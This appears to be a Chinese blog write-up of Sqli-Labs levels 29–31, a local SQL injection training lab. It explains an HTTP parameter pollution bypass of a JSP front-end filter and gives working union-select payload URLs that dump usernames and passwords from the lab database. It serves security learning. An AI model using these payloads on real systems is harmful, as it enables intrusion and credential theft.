Sqli-Labs less29-31

Posted 2021-03-13 n0r4h

Less-29

 

可以从介绍上看出，第29关被称为世界上最好的WAF，网上许多讲解的办法就是和第一关差不多，其实是不对的。

sqli-labs文件夹下面还有tomcat文件，这才是真正的less，里面的jspstudy需要搭建环境jspstudy：https://www.xp.cn/download.html

 

 

 

 

 

 注意下载完之后可能出现阿帕奇端口冲突的情况，可以修改jspstudy的为8080，也要注意默认打开路径。

 

 

 

 

 

 

 

前置基础知识：

再补充一下服务器两层架构的知识：https://www.cnblogs.com/lcamry/p/5762961.html

 

 

 

29关的WAF:参数污染：jsp/tomcat使用getgetParameter("id")获取到的是第一个值，php/apache使用$_GET["id"]获取的是第二个值，那么第一个id纯数字，第二个id的值

也就是，需要注入两个参数，第二个参数才是可以实现sql注入的：下图图一是只有一个参数，图二是两个参数才可以

 

 

 

 

 

 用两个参数绕过WAF之后，其他步骤和以前相同：直接最后一步

http://127.0.0.1:8080/sqli-labs/Less-29/index.jsp?id=1&&id=0\' union select 1,2,(concat_ws(0x7e,username,password)) from security.users limit 3,1  --+

 

 

 

 

less-30

30关与29关基本一样，就是sql闭合变成了双引号：http://127.0.0.1:8080/sqli-labs/Less-30/?id=1&id=0" union select 1,2,(concat_ws(0x7e,username,password)) from security.users limit 3,1--+

 

 

 

less-31

31关也是类似，sql闭合变成了“）

http://127.0.0.1:8080/sqli-labs/Less-31/?id=1&id=0") union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+